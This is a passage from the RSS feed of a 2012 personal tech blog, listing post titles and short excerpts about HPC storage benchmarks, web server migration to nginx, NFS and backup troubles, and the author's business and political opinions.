      <pubDate>Sat, 09 Jun 2012 20:09:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/ot-wishing-for-more-competition-in-cellular-phones/</guid>
      <description>Just spent 3+ hours dealing with Verizon over setting up a business account for the company, moving phones/mifi to this, and getting a new line. Discovering in the process that the company doesn&amp;rsquo;t quite grok business customers. Or its own products. Or what its sold. Sadly, Verizon&amp;rsquo;s network is the best. Sadly, they are &amp;hellip; a royal pain &amp;hellip; to deal with. Very long story, wish it weren&amp;rsquo;t as bad as it is here.</description>
    </item>
    
    <item>
      <title>code angry: Application gateway via very powerful Perl code</title>
      <link>https://blog.scalability.org/2012/06/code-angry/</link>
      <pubDate>Tue, 05 Jun 2012 06:18:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/code-angry/</guid>
      <description>I&amp;rsquo;ve been banging my head against fastcgi. At a fundamental level, fastcgi is meant to be a CGI gateway allowing multiple simultaneous processes to run at once, to serve pages. Ok. nginx (and Apache, and others) can use fastcgi to run PHP code. Well, Apache can run it &amp;ldquo;natively&amp;rdquo; while the others need to run it externally. Our website is PHP based (drupal). So are some of our tools. And ya know, the transition to nginx has not been smooth for them.</description>
    </item>
    
    <item>
      <title>A lesson in economics</title>
      <link>https://blog.scalability.org/2012/06/a-lesson-in-economics/</link>
      <pubDate>Sat, 02 Jun 2012 19:51:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/a-lesson-in-economics/</guid>
      <description>This is somewhat tangential (at least the initial part) to HPC and storage, but it has significant similarities &amp;hellip; its worth paying attention to. Much text, noise, and argumentation have surrounded things like Obamacare here in the US. This is, whether or not the proponents like to admit it or not, a push for a socialized medical system, with &amp;ldquo;controlled&amp;rdquo; costs, and all manner of other things. Yeah, we&amp;rsquo;ll hear how the US has &amp;ldquo;crappy&amp;rdquo; medical coverage, or country X is so much better because everyone gets coverage.</description>
    </item>
    
    <item>
      <title>Nginx rules ...</title>
      <link>https://blog.scalability.org/2012/06/nginx-rules/</link>
      <pubDate>Fri, 01 Jun 2012 15:05:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/06/nginx-rules/</guid>
      <description>I was having lots &amp;hellip; and I mean LOTS of trouble with apache 2.2 on the new web server. It simply refused to do vhosts no matter what I did. Debugging it was painful. I&amp;rsquo;d tried lighttpd in the past, and while I liked some aspects of it better than Apache, it still was hard to debug. So I figured I&amp;rsquo;d give nginx a try. Its an up and comer in the web serving business, and seems to be one of fastest growing on the net.</description>
    </item>
    
    <item>
      <title>... and the VM (and its snapshot) managed to get corrupted ...</title>
      <link>https://blog.scalability.org/2012/05/and-the-vm-and-its-snapshot-managed-to-get-corrupted/</link>
      <pubDate>Thu, 31 May 2012 05:41:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/and-the-vm-and-its-snapshot-managed-to-get-corrupted/</guid>
      <description>Talking about rt. Our support site. Thankfully most of the stuff is in the database with a little customization. Thankfully we want to move from 3.x to 4.x. Annoyingly, this is more work. Thankfully, our web server design is now far more intelligent than in the past. We may simply run it on the web frontend directly, rather than running it as a VM. There&amp;rsquo;s really little advantage to the VM, and we keep having to do a reset of the VM.</description>
    </item>
    
    <item>
      <title>Why ... oh ... why ...</title>
      <link>https://blog.scalability.org/2012/05/why-oh-why/</link>
      <pubDate>Thu, 31 May 2012 05:07:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/why-oh-why/</guid>
      <description>Dear Red Hat: You put out a good product in RHEL 6.x. Ignoring the (often massive) performance regressions, other things are better/more stable. Dracut, is growing on me. Actually liking being able to debug startup. But, this said &amp;hellip; I have to inquire &amp;hellip; Why on earth did you include an End-Of-Lifed version of Perl (5.10.x) in RHEL 6.x? What &amp;hellip; exactly &amp;hellip; was the thought process behind this? Have a look here: and search for &amp;ldquo;Latest releases in each branch&amp;rdquo;.</description>
    </item>
    
    <item>
      <title>Snort ... guffaw .... cackle ...</title>
      <link>https://blog.scalability.org/2012/05/snort-guffaw-cackle/</link>
      <pubDate>Wed, 30 May 2012 03:31:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/snort-guffaw-cackle/</guid>
      <description>Enjoyed this read. Some of the take away snippets
Ok, there is a combination of humor, and a possible simple test to determine if you are one of them thar bad &amp;ldquo;right-wingers&amp;rdquo; (note: tongue firmly planted in cheek here). Just ask a) education level, and b) opinion of AGW. But even more than this &amp;hellip; this study was drive by the soft science folks wondering about some attitudes and levels of scientific literacy and numeracy.</description>
    </item>
    
    <item>
      <title>RIP Kyril Faenov</title>
      <link>https://blog.scalability.org/2012/05/rip-kyril-faenov/</link>
      <pubDate>Wed, 30 May 2012 00:08:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/rip-kyril-faenov/</guid>
      <description>Kyril Faenov of Microsoft passed away several days ago. He was one of the visionaries and leaders behind Microsoft&amp;rsquo;s HPC effort. He was also a nice guy, one whom I had a chance to talk with several times over the last few years. One of the bright folks you like to challenge. I respected him and his efforts, even if I didn&amp;rsquo;t agree with them. More information here, and I found this originally at InsideHPC.</description>
    </item>
    
    <item>
      <title>Stress analysis of a market ...  does this explain Facebook&#39;s IPO issues?</title>
      <link>https://blog.scalability.org/2012/05/stress-analysis-of-a-market-does-this-explain-facebooks-ipo-issues/</link>
      <pubDate>Sat, 26 May 2012 20:44:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/stress-analysis-of-a-market-does-this-explain-facebooks-ipo-issues/</guid>
      <description>c.f. this post at ZeroHedge.
In case you haven&amp;rsquo;t guessed it, ZeroHedge does not like HFT aka algorithmic trading. Its an informative blog &amp;hellip; sometimes bordering on alarmist &amp;hellip; but for the most part, a good read.</description>
    </item>
    
    <item>
      <title>Misalignment of performance expectations and reality</title>
      <link>https://blog.scalability.org/2012/05/misalignment-of-performance-expectations-and-reality/</link>
      <pubDate>Sat, 26 May 2012 18:08:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/misalignment-of-performance-expectations-and-reality/</guid>
      <description>We are working on a project for a consulting customer. They&amp;rsquo;ve hired us to help them figure out where their performance is being &amp;ldquo;lost&amp;rdquo;. Obviously, without naming names or revealing information, I note something interesting about this, that I&amp;rsquo;ve alluded to many times before. There is an often profound mismatch between expectations for a system and what it actually achieves. This is in large part, why we benchmark and test our systems in as real configurations as possible, and report real numbers, while many (most) of our competitors make WAGs at best case/best effort/best condition theoretical numbers.</description>
    </item>
    
    <item>
      <title>siFlash tuning</title>
      <link>https://blog.scalability.org/2012/05/siflash-tuning/</link>
      <pubDate>Fri, 25 May 2012 16:47:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/siflash-tuning/</guid>
      <description>We&amp;rsquo;ve been tuning our siFlash. Not done yet &amp;hellip; not done, but look where we are. 24 simultaneous streaming (non-cached) reads.
Run status group 0 (all jobs): READ: io=193632MB, aggrb=7781.4MB/s, minb=7781.4MB/s, maxb=7781.4MB/s, mint=24884msec, maxt=24884msec  Yeah. Baby. Added another almost GB/s to the read performance. Streaming write performance is hovering around 2.6GB/s. Remember, this is a half configured system. Imagine what we could do with a fully configured system. Sustaining 147k random write IOPs (4k random writes, with 144 simultaneous threads), and 210k random read IOPs.</description>
    </item>
    
    <item>
      <title>What high performance isn&#39;t</title>
      <link>https://blog.scalability.org/2012/05/what-high-performance-isnt/</link>
      <pubDate>Fri, 25 May 2012 09:49:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/what-high-performance-isnt/</guid>
      <description>We&amp;rsquo;ve had a number of interesting interactions with customers over the last few weeks. They all seem to center on, and around, how to get high performance out of gear which isn&amp;rsquo;t designed for high performance. Generally speaking, you can&amp;rsquo;t. High performance requires a mixture of design and implementation, with well designed and implemented parts. High performance isn&amp;rsquo;t
 A random collection of web and file servers joined together with clustering tools Some random tier 1 box usually used as a lower end file server shoved with disks/ssd/Flash A poorly architected, but easy to purchase system (e.</description>
    </item>
    
    <item>
      <title>Thinking of using Warewulf as a base for some of our diskless work</title>
      <link>https://blog.scalability.org/2012/05/thinking-of-using-warewulf-as-a-base-for-some-of-our-diskless-work/</link>
      <pubDate>Thu, 24 May 2012 04:54:29 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/thinking-of-using-warewulf-as-a-base-for-some-of-our-diskless-work/</guid>
      <description>I&amp;rsquo;ve been thinking about this for a while. We have a good diskless system, but I&amp;rsquo;ve always liked the nano-ramdisk version of the OS. Create a base distro with JEOS (just enough OS) to boot, and mount all the other bits you need. Not that there is anything wrong with what we are doing now, its just that I really like that capability. Especially if we could keep the ramdisk compressed.</description>
    </item>
    
    <item>
      <title>An NFS gotcha</title>
      <link>https://blog.scalability.org/2012/05/an-nfs-gotcha/</link>
      <pubDate>Thu, 24 May 2012 04:44:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/an-nfs-gotcha/</guid>
      <description>As we rebuild our server infrastructure (aside from taking time to do things more intelligently), we run into some bumps. This one sorta threw me for a bit.
[root@virtual ~]# mount -a mount.nfs: Stale NFS file handle mount.nfs: Stale NFS file handle  Checked all the usual suspects. No dice. The /etc/exports was correct, and visible locally. There was a DNS oddity I resolved (humor &amp;hellip; heh). But mounts kept giving me the stale NFS handle.</description>
    </item>
    
    <item>
      <title>When core assumptions that should never be wrong, do turn out to be wrong</title>
      <link>https://blog.scalability.org/2012/05/when-core-assumptions-that-should-never-be-wrong-do-turn-out-to-be-wrong/</link>
      <pubDate>Wed, 23 May 2012 01:23:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/when-core-assumptions-that-should-never-be-wrong-do-turn-out-to-be-wrong/</guid>
      <description>So &amp;hellip; where does this tale begin? We had a nice backup system in place at the lab. Twice a week, all the important servers would happily sync their contents to this unit over Gigabit ethernet. It worked well, we were happy. Place that snippet in the background, it will come up again. I&amp;rsquo;ve told our customers for a long time that RAID is not a backup. RAID is RAID, it gives you time to recover from a failure.</description>
    </item>
    
    <item>
      <title>... and it can talk ...</title>
      <link>https://blog.scalability.org/2012/05/and-it-can-talk/</link>
      <pubDate>Fri, 18 May 2012 18:38:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/and-it-can-talk/</guid>
      <description>[root@&amp;lt;a href=&amp;quot;http://scalableinformatics.com&amp;quot;&amp;gt;skunkworks-prototype-n2&amp;lt;/a&amp;gt; ~]# ifinfo device:	address/netmask	MTU	Tx (MB)	Rx (MB) eth0:	addr not set/mask not set 1500	0.000	0.000 eth1:	addr not set/mask not set 1500	0.000	0.000 eth10:	addr not set/mask not set 1500	0.000	0.000 eth11:	addr not set/mask not set 1500	0.000	0.000 eth12:	addr not set/mask not set 1500	0.000	0.000 eth13:	addr not set/mask not set 1500	0.000	0.000 eth14:	addr not set/mask not set 1500	0.</description>
    </item>
    
    <item>
      <title>Its ... alive ....</title>
      <link>https://blog.scalability.org/2012/05/its-alive/</link>
      <pubDate>Thu, 17 May 2012 20:24:40 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/its-alive/</guid>
      <description>Our little skunkworks project boots!!! Mwahahahaha! Must check off on our list
 design build boot ??? profit (or something)!  Note to self: work on eeeeevul laughter &amp;hellip;. And get step 4 ironed out too.</description>
    </item>
    
    <item>
      <title>After 4 years, our deskside JackRabbit unit decided to shrug off its mortal coil</title>
      <link>https://blog.scalability.org/2012/05/after-4-years-our-deskside-jackrabbit-unit-decided-to-shrug-off-its-mortal-coil/</link>
      <pubDate>Wed, 16 May 2012 20:12:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/after-4-years-our-deskside-jackrabbit-unit-decided-to-shrug-off-its-mortal-coil/</guid>
      <description>икона за подарък&amp;hellip; and in the process, take down a drive, 5 of its friends, and our RAID card. We have backups from before the move (15+ days old &amp;hellip; sigh). We&amp;rsquo;ve decided to go full monty on the new unit. Its a JackRabbit JR4 with 12x 2TB drives, 2 hot spares, and 10 disk RAID6 (8x data drives). 2x OS drives (on SSDs, rear mount). Leaves us 12 open bays.</description>
    </item>
    
    <item>
      <title>Updating a design to modern concepts ...</title>
      <link>https://blog.scalability.org/2012/05/3822/</link>
      <pubDate>Wed, 16 May 2012 01:24:37 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/3822/</guid>
      <description>So in order to (really) bring my monitoring app into the modern age, I want to change its flow from a synchronous on-demand event driven analysis and reporting tool, to an asynchronous monitoring and analysis tool, with an on-demand &amp;ldquo;report&amp;rdquo; function which is basically a presentation core atop the data set. There are many reasons for this. Not the least of which is that this should be far more efficient at handling what I want to do &amp;hellip; not to mention more responsive.</description>
    </item>
    
    <item>
      <title>Spam that made my day</title>
      <link>https://blog.scalability.org/2012/05/spam-that-made-my-day/</link>
      <pubDate>Tue, 15 May 2012 19:51:12 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/spam-that-made-my-day/</guid>
      <description>This is seriously &amp;hellip; seriously funny. Note the addresses.
 
 ROTFLMAO!!!!</description>
    </item>
    
    <item>
      <title>Every now and then, the truth leaks out</title>
      <link>https://blog.scalability.org/2012/05/every-now-and-then-the-truth-leaks-out/</link>
      <pubDate>Tue, 15 May 2012 17:26:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/every-now-and-then-the-truth-leaks-out/</guid>
      <description>Good article from Matt Asay in The Register today.
This is about as truthful as it gets. There are many tiny startups, pulling in various fractions of $1M to more than $10M to develop &amp;hellip; product features. Is this really the right approach for VCs? And this opens up some interesting new questions on startups and their product offerings themselves. Take Netflix. Running on Amazon S3. And what does Amazon do?</description>
    </item>
    
    <item>
      <title>On my fun end of a week ...</title>
      <link>https://blog.scalability.org/2012/05/on-my-fun-end-of-a-week/</link>
      <pubDate>Tue, 15 May 2012 07:00:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/on-my-fun-end-of-a-week/</guid>
      <description>(this was actually a while ago, just getting to publishing it now). Friday, I drove up to a local University to drop off our bid. I sent a note beforehand to let them know I might be a few minutes late, there was construction. Sure enough, got caught in a 30 minute slowdown. I was 13 minutes late. They said, &amp;ldquo;hey thats great. We won&amp;rsquo;t look at it&amp;rdquo; Then on the way back, the old landlord refused to acknowledge that we were tenants, so they refused to refund our deposit.</description>
    </item>
    
    <item>
      <title>2 out of 3 ain&#39;t bad</title>
      <link>https://blog.scalability.org/2012/05/2-out-of-3-aint-bad/</link>
      <pubDate>Tue, 15 May 2012 06:46:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/2-out-of-3-aint-bad/</guid>
      <description>No, not Meatloaf lyrics. A few years ago, I guessed that the HPC market was going to bifurcate or possibly trifurcate. Well, its about 3 years on, and bifurcate it did. Accelerators (in the form of GPUs) are everywhere. I was dead on correct in almost every aspect of what I had predicted (privately to VCs, from whom we couldn&amp;rsquo;t raise a cent in the early/mid 2000&amp;rsquo;s for this market). Remote cluster/clouds with dropping prices per CPU hour are taking over sections of HPC, and we see some impact upon purchase decisions made by people buying clusters.</description>
    </item>
    
    <item>
      <title>Parsing apache logs ...</title>
      <link>https://blog.scalability.org/2012/05/parsing-apache-logs/</link>
      <pubDate>Mon, 07 May 2012 03:43:21 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/parsing-apache-logs/</guid>
      <description>Seems I&amp;rsquo;m not alone in the world wanting to parse apache log files. I googled lots of people bitterly complaining about it. Some folks wanted to write a grammar, and a flex/yacc/bison thingy. I am sure that there are some Java programmers who&amp;rsquo;ve been working on this &amp;hellip; oh &amp;hellip; 6 or 7 years or so, and may be approaching a solution, with a Java byte code only slightly below 1 PB in size.</description>
    </item>
    
    <item>
      <title>Good programming tools and good program implementation</title>
      <link>https://blog.scalability.org/2012/05/good-programming-tools-and-good-program-implementation/</link>
      <pubDate>Sun, 06 May 2012 17:14:31 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/good-programming-tools-and-good-program-implementation/</guid>
      <description>Way back in my early days at web programming stuff, I started out with HTML::Mason as a templating engine. There is nothing wrong with Mason, its actually quite good. But it encourages the same sort of &amp;ldquo;code-in-page&amp;rdquo; designs that the entire language of PHP was built around. I&amp;rsquo;m mostly a Perl guy for application level stuff these days &amp;hellip; have done my time with Fortran, Python, x86 assembly, C/C++, and many others.</description>
    </item>
    
    <item>
      <title>Company&#39;s email and web are now on EC2</title>
      <link>https://blog.scalability.org/2012/05/companys-email-and-web-are-now-on-ec2/</link>
      <pubDate>Sun, 06 May 2012 16:34:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/companys-email-and-web-are-now-on-ec2/</guid>
      <description>Turns out Comcast doesn&amp;rsquo;t follow through (even when you call them many times to try to get them to). Thanks #Comcast . On Thursday, I bought a Mifi (pay as you go) from Verizon. Got it into the office. Had moved the web/mail stuff to Amazon EC2 &amp;ldquo;just in case&amp;rdquo; Comcast pulled a &amp;hellip; well &amp;hellip; Comcast. Yeah, took me a little while to fix the email and web side. We&amp;rsquo;ve been using our router appliance as our SOA for dns, and I had to unplug it at the old site (got everything out before 5pm Friday).</description>
    </item>
    
    <item>
      <title>What high performance storage isn&#39;t ...</title>
      <link>https://blog.scalability.org/2012/05/what-high-performance-storage-isnt/</link>
      <pubDate>Sun, 06 May 2012 15:51:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/what-high-performance-storage-isnt/</guid>
      <description>This happens often. We get a call from a user whose seen my postings in the Gluster or other lists. They&amp;rsquo;ve set up a storage system, and the performance is terrible. Is there anything that can be done about this? We dig into this, and find out that the people bought hardware, usually fairly low end/cheap brand name (e.g. tier 1) nodes, with limited disk options, and are running 1 disk for OS, and have another single larger SATA or SAS disk for storage.</description>
    </item>
    
    <item>
      <title>... and old faces leaving and new joining</title>
      <link>https://blog.scalability.org/2012/05/and-old-faces-leaving-and-new-joining/</link>
      <pubDate>Thu, 03 May 2012 01:56:44 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/and-old-faces-leaving-and-new-joining/</guid>
      <description>One of our guys has left the organization. This is always hard. He is a good person, I like him a great deal. But I understand that sometimes there isn&amp;rsquo;t as good a fit as we might like there to be. If you happen to know a great HPC organization that needs an awesome senior sales dude, please email at the day job (landman At ScalableInformatics.com), and I&amp;rsquo;ll pass the contact along to him.</description>
    </item>
    
    <item>
      <title>New office ...</title>
      <link>https://blog.scalability.org/2012/05/new-office/</link>
      <pubDate>Thu, 03 May 2012 01:53:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/new-office/</guid>
      <description>&amp;hellip; movers pick up the old office bits tomorrow, and bring it to the new office. Have some (re)construction to do, some racks to stand up, an AC unit to hook up &amp;hellip; and then the important things (which I learnt from my friends and customers in the UK) &amp;hellip; a refrigerator and good cappuccino machine to buy &amp;hellip;</description>
    </item>
    
    <item>
      <title>Something ... awesome ... this way comes</title>
      <link>https://blog.scalability.org/2012/05/something-awesome-this-way-comes/</link>
      <pubDate>Thu, 03 May 2012 01:51:43 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/something-awesome-this-way-comes/</guid>
      <description>Ever had an OMFG moment? Ever wish you could share it? In time, in time.</description>
    </item>
    
    <item>
      <title>Q: So why did this go &#34;bang&#34; ?</title>
      <link>https://blog.scalability.org/2012/05/q-so-why-did-this-go-bang/</link>
      <pubDate>Thu, 03 May 2012 01:47:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/05/q-so-why-did-this-go-bang/</guid>
      <description>A: I updated the OS. Bad &amp;hellip; bad Joe. Very bad. Don&amp;rsquo;t do that. Baaaaaaad Joe. &amp;hellip; and now I get to fix the email, and the file server portion &amp;hellip; and &amp;hellip; Thank gosh for my &amp;hellip; er &amp;hellip; paranoid backing up of useful things. Pack-rat-ism is not a disease &amp;hellip; its a quality &amp;hellip; a feature.</description>
    </item>
    
    <item>
      <title>Python ... grrrr</title>
      <link>https://blog.scalability.org/2012/04/python-grrrr/</link>
      <pubDate>Thu, 26 Apr 2012 03:12:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/python-grrrr/</guid>
      <description>Hacking up some python classes and object bits for a project. Honestly, this would be soooooo much easier in Perl, but for a number of reasons, the person started it in Python. So we are trying to contribute. And I am running into some of the more joyous elements of python. Such as completely inane error messages which tell you next to zero about what the real problem is. Thankfully, I have google.</description>
    </item>
    
    <item>
      <title>Ahhh ... IPsec ... How I loath thee ...</title>
      <link>https://blog.scalability.org/2012/04/ahhh-ipsec-how-i-loath-thee/</link>
      <pubDate>Wed, 25 Apr 2012 15:09:32 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/ahhh-ipsec-how-i-loath-thee/</guid>
      <description>Ok, maybe not the spec so much. Maybe just the client codes. Working on setting up an IPsec tunnel. The only IPsec implementation that I&amp;rsquo;ve tried on the client side that actually seems to work (e.g. get to a point where I can debug it) is Apple&amp;rsquo;s. Haven&amp;rsquo;t tried the Cisco yet, we don&amp;rsquo;t have a support contract with them, so we can&amp;rsquo;t download it and test it. Since we are setting this up for a customer who does, either we&amp;rsquo;ll VPN into their site and set it up, or work something out.</description>
    </item>
    
    <item>
      <title>OT: as the political season rolls on ...</title>
      <link>https://blog.scalability.org/2012/04/ot-as-the-political-season-rolls-on/</link>
      <pubDate>Wed, 25 Apr 2012 15:01:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/ot-as-the-political-season-rolls-on/</guid>
      <description>I&amp;rsquo;ve mentioned it before here, that this is a presidential election year in the US, and I expect it to be a nasty one, at best. We in the states largely fall into one of two major parties, with some of us proclaiming independence or preference for other parties in the noise. The media in this country is biased pretty hard in one direction with one solitary exception. Every now and then they admit it (as the NY Times did a few days ago).</description>
    </item>
    
    <item>
      <title>Epic failure: Apple security mismatches</title>
      <link>https://blog.scalability.org/2012/04/epic-failure-apple-security-mismatches/</link>
      <pubDate>Mon, 23 Apr 2012 15:39:02 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/epic-failure-apple-security-mismatches/</guid>
      <description>Was trying to install an app on Saturday. Up popped a request for more information, including a second attempt at getting my password, and then 3 &amp;ldquo;security&amp;rdquo; questions, including &amp;ldquo;What city was I first kissed in.&amp;rdquo; Um. Ok. That is an EPIC FAIL in and of itself, but lets go on to the real &amp;hellip; BIG EPIC FAIL. The security questions presented on the Apple app do not match those, or even come close to matching those on the appleid.</description>
    </item>
    
    <item>
      <title>The TB sprint updated ...</title>
      <link>https://blog.scalability.org/2012/04/the-tb-sprint-updated/</link>
      <pubDate>Mon, 23 Apr 2012 06:18:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/the-tb-sprint-updated/</guid>
      <description>Previous results here. 12.4TB/hour. A new JackRabbit unit with some updates. New results: 1TB written in 228.2 seconds. 15.8TB/hour writes
Run status group 0 (all jobs): WRITE: io=1024.6GB, aggrb=4597.1MB/s, minb=4597.1MB/s, maxb=4597.1MB/s, mint=228167msec, maxt=228167msec  and for the reads &amp;hellip;
Run status group 0 (all jobs): READ: io=1024.6GB, aggrb=5341.9MB/s, minb=5341.9MB/s, maxb=5341.9MB/s, mint=196392msec, maxt=196392msec  This is 18.3TB/hour reads. Writing 1PB on this machine would take almost 65 hours. So if we could break the writes across 65 machines (9 racks), we could write 1PB in 1 hour.</description>
    </item>
    
    <item>
      <title>PHD comics ... the movie</title>
      <link>https://blog.scalability.org/2012/04/phd-comics-the-movie/</link>
      <pubDate>Mon, 23 Apr 2012 03:25:16 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/phd-comics-the-movie/</guid>
      <description>See info here.</description>
    </item>
    
    <item>
      <title>Oh joy ...</title>
      <link>https://blog.scalability.org/2012/04/oh-joy/</link>
      <pubDate>Fri, 20 Apr 2012 16:00:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/oh-joy/</guid>
      <description>Pretty good probability I&amp;rsquo;ll be needing to go to London this weekend to fix a problem caused by a somewhat overzealous local support org. See the motherboard post from a few days ago. Turns out they damaged the replacement they put in. I like London. I don&amp;rsquo;t like having to do this though.</description>
    </item>
    
    <item>
      <title>Update on our lawyergram</title>
      <link>https://blog.scalability.org/2012/04/update-on-our-lawyergram/</link>
      <pubDate>Thu, 19 Apr 2012 05:16:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/update-on-our-lawyergram/</guid>
      <description>A few months ago, the bank which had foreclosed on our now former landlord executed what could be called a legal pressure manuever. They wanted us to buy the space we are renting. They threatened to sue us for back rent. Our lawyer skillfully deflected this, pointing out their several failures in the process. They finally admitted they were seeking to pressure us to buy it. Go figure. So we are about to move to a larger spot.</description>
    </item>
    
    <item>
      <title>The danger in modifying precision built and tuned machines ...</title>
      <link>https://blog.scalability.org/2012/04/the-danger-in-modifying-precision-built-and-tuned-machines/</link>
      <pubDate>Thu, 19 Apr 2012 05:08:20 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/the-danger-in-modifying-precision-built-and-tuned-machines/</guid>
      <description>&amp;hellip; is that they won&amp;rsquo;t be precision tuned after you are done with them. And worse, much of this is self-inflicted in various cases. We try to ship absolutely peak performance machines. Tuned as much as possible, though in some cases, customers make requests that go against high performance. We try to explain the issues, but customers are always right, even when they aren&amp;rsquo;t. In a number of cases, customers wipe what we&amp;rsquo;ve done.</description>
    </item>
    
    <item>
      <title>&#34;Hey, here&#39;s a nice machine, let&#39;s replace its motherboard&#34;</title>
      <link>https://blog.scalability.org/2012/04/hey-heres-a-nice-machine-lets-replace-its-motherboard/</link>
      <pubDate>Thu, 19 Apr 2012 04:53:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/hey-heres-a-nice-machine-lets-replace-its-motherboard/</guid>
      <description>Something like this just happened to one of our customers. I am aghast that this was done the way it was, but it was. One of these things where you don&amp;rsquo;t find out that there was a service issue until its &amp;ldquo;done&amp;rdquo;. For various definitions of &amp;ldquo;done&amp;rdquo;. I anticipate being on a phone call to Europe in a few hours to discuss my definition of &amp;ldquo;done&amp;rdquo; with the people who did this, and ask them if their definition of &amp;ldquo;done&amp;rdquo; includes the concept of operating correctly.</description>
    </item>
    
    <item>
      <title>Mebbe there is a reason that I am in &#34;fly over&#34; country ...</title>
      <link>https://blog.scalability.org/2012/04/mebbe-there-is-a-reason-that-i-am-in-fly-over-country/</link>
      <pubDate>Thu, 19 Apr 2012 04:29:48 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/mebbe-there-is-a-reason-that-i-am-in-fly-over-country/</guid>
      <description>So here I am, toiling in the salt mines (just don&amp;rsquo;t tell my wife its not really that bad), trying to eek out a living selling, servicing, and supporting some insanely fast storage kit to a range of customers, when I hear that Instagram had sold for $1B. My first thought. What the 4K (phonetic, just don&amp;rsquo;t say it out loud) is Instagram? And what did it do that made it worth $1B?</description>
    </item>
    
    <item>
      <title>Way way back ...</title>
      <link>https://blog.scalability.org/2012/04/way-way-back/</link>
      <pubDate>Tue, 17 Apr 2012 20:27:04 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/way-way-back/</guid>
      <description>&amp;hellip; when I was at SGI &amp;hellip; oh &amp;hellip; 16 years ago or so, someone, for some reason sent me an email where they made some specious claims. I calmly pointed out to them where I caught their error, what the error was, and how they could fix it. They then proceeded to attack me in email, and started bugging me on my work phone. Later, after I had left SGI and started Scalable, someone had posted some rather poorly thought out discussion of something, and attacked me (again) for some rather idiotic reasoning.</description>
    </item>
    
    <item>
      <title>Is LinkedIn just Usenet with a pretty face?</title>
      <link>https://blog.scalability.org/2012/04/is-linkedin-just-usenet-with-a-pretty-face/</link>
      <pubDate>Tue, 17 Apr 2012 20:11:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/is-linkedin-just-usenet-with-a-pretty-face/</guid>
      <description>I am starting to think so. Had a little discussion with someone I thought would be professional, who made some interesting claims, and didn&amp;rsquo;t quite like it when challenged. And it devolved from there. I guess it is funny to see someone try to explain stuff to me, who doesn&amp;rsquo;t quite know my background, or experience, or &amp;hellip; I&amp;rsquo;ve heard from others who believe that LinkedIn is as complete a waste of time as Facebook.</description>
    </item>
    
    <item>
      <title>OT: Annoying spammers</title>
      <link>https://blog.scalability.org/2012/04/ot-annoying-spammers/</link>
      <pubDate>Mon, 16 Apr 2012 16:31:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/ot-annoying-spammers/</guid>
      <description>Some idiots have taken our companies phone number, inserted it into their caller-id bits (seemingly with SIP phones), and have been harassing people. So we get frustrated people calling us, asking us if we called them. No we didn&amp;rsquo;t. I hate phone marketeers as much as everyone. This is really annoying. Can&amp;rsquo;t see any rational reason for this other than someone trying to steal the companies reputation.</description>
    </item>
    
    <item>
      <title>sad/exciting time ahead</title>
      <link>https://blog.scalability.org/2012/04/sadexciting-time-ahead/</link>
      <pubDate>Mon, 16 Apr 2012 14:57:59 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/sadexciting-time-ahead/</guid>
      <description>One of our customers has become fed up with the issues they&amp;rsquo;ve run into on Gluster. Started about a year ago, with some odd outages in the 3.0.x system, and didn&amp;rsquo;t improve with 3.2.x &amp;hellip; in some instances it got worse. RDMA support in 3.0.x was pretty good, there were other bugs (which were annoying). The migration to 3.2.x was rocky. Libraries left from 3.0.x were somehow picked up and some things just failed.</description>
    </item>
    
    <item>
      <title>High performance firewall ... with a nice 10GbE port</title>
      <link>https://blog.scalability.org/2012/04/high-performance-firewall-with-a-nice-10gbe-port/</link>
      <pubDate>Mon, 16 Apr 2012 03:38:28 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/04/high-performance-firewall-with-a-nice-10gbe-port/</guid>
